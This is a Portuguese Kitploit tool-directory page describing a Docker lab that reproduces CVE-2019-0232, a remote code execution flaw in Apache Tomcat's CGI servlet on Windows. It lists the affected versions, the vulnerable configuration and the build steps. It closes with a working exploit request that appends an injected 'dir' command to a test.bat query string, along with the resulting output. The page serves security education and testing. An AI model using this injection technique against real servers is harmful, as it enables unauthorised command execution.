Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Preproduce-CVE-2019-0232 — Ambiente de laboratório baseado em Docker para reproduzir CVE-2019-0232, uma vulnerabilidade de execução remota de código no Apache Tomcat CGI Servlet no Windows, com exemplos de exploração. | Kitploit
Ferramentas/GitHubGitHub/luongchivi/preproduce-cve-2019-0232
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubluongchivi/preproduce-cve-2019-0232

Preproduce-CVE-2019-0232

Ambiente de laboratório baseado em Docker para reproduzir CVE-2019-0232, uma vulnerabilidade de execução remota de código no Apache Tomcat CGI Servlet no Windows, com exemplos de exploração.

Ver Repositório
1há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-0232 - Execução Remota de Código no Servlet CGI do Apache Tomcat

Este repositório fornece um ambiente de laboratório baseado em Docker para reproduzir a vulnerabilidade CVE-2019-0232 no Apache Tomcat 9.0.17 no Windows.

Visão Geral da Vulnerabilidade

A CVE-2019-0232 é uma vulnerabilidade de execução remota de código no Servlet CGI do Apache Tomcat quando executado no Windows. O problema surge devido ao tratamento inadequado dos argumentos de linha de comando quando o parâmetro enableCmdLineArguments está definido como true. Um atacante pode passar argumentos arbitrários ao script CGI por meio da query string, levando à execução de comandos do sistema.

  • Versões afetadas: Apache Tomcat 9.0.0.M1 até 9.0.17
  • Versões corrigidas: 9.0.18 e posteriores
  • Condições necessárias:
    • Sistema operacional Windows
    • enableCmdLineArguments=true na configuração do servlet CGI
    • Servlet CGI habilitado e mapeado para um padrão de URL

Ambiente de Laboratório

Estrutura de Diretórios

root@kitploit:~
tomcat-cgi-lab
├── docker-compose.yml
├── Dockerfile
└── tomcat
	├── apache-tomcat-9.0.17-windows-x64.zip
    └── apache-tomcat-9.0.17
        ├── conf
        │   └── context.xml              ← (privileged="true")
        └── webapps
            └── ROOT
                └── WEB-INF
                    ├── web.xml           ← (CGI configuration)
                    └── cgi-bin
                        └── test.bat      ← (.bat script)

Arquivos de Configuração

  • context.xml: Define privileged="true" para permitir que o aplicativo web utilize o servlet CGI.
  • web.xml: Define o servlet CGI com enableCmdLineArguments=true e o mapeia para /cgi-bin/*.
  • test.bat: Um script de lote simples que retorna uma mensagem de boas-vindas.

Como Começar

Pré-requisitos

  • Docker (modo de contêineres Windows)
  • Docker Compose

Compilar e Executar

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

Exploração

root@kitploit:~
curl -i "http://localhost:8080/cgi-bin/test.bat?&dir"

Welcome to CGI Test Page
 Volume in drive C has no label.
 Volume Serial Number is 3E70-7C38

 Directory of C:\apache-tomcat-9.0.17\webapps\ROOT\WEB-INF\cgi-bin

07/12/2026  11:45 AM    <DIR>          .
07/12/2026  11:45 AM    <DIR>          ..
07/12/2026  12:25 PM                78 test.bat
               1 File(s)             78 bytes
               2 Dir(s)  136,027,971,584 bytes free
Baixar ferramenta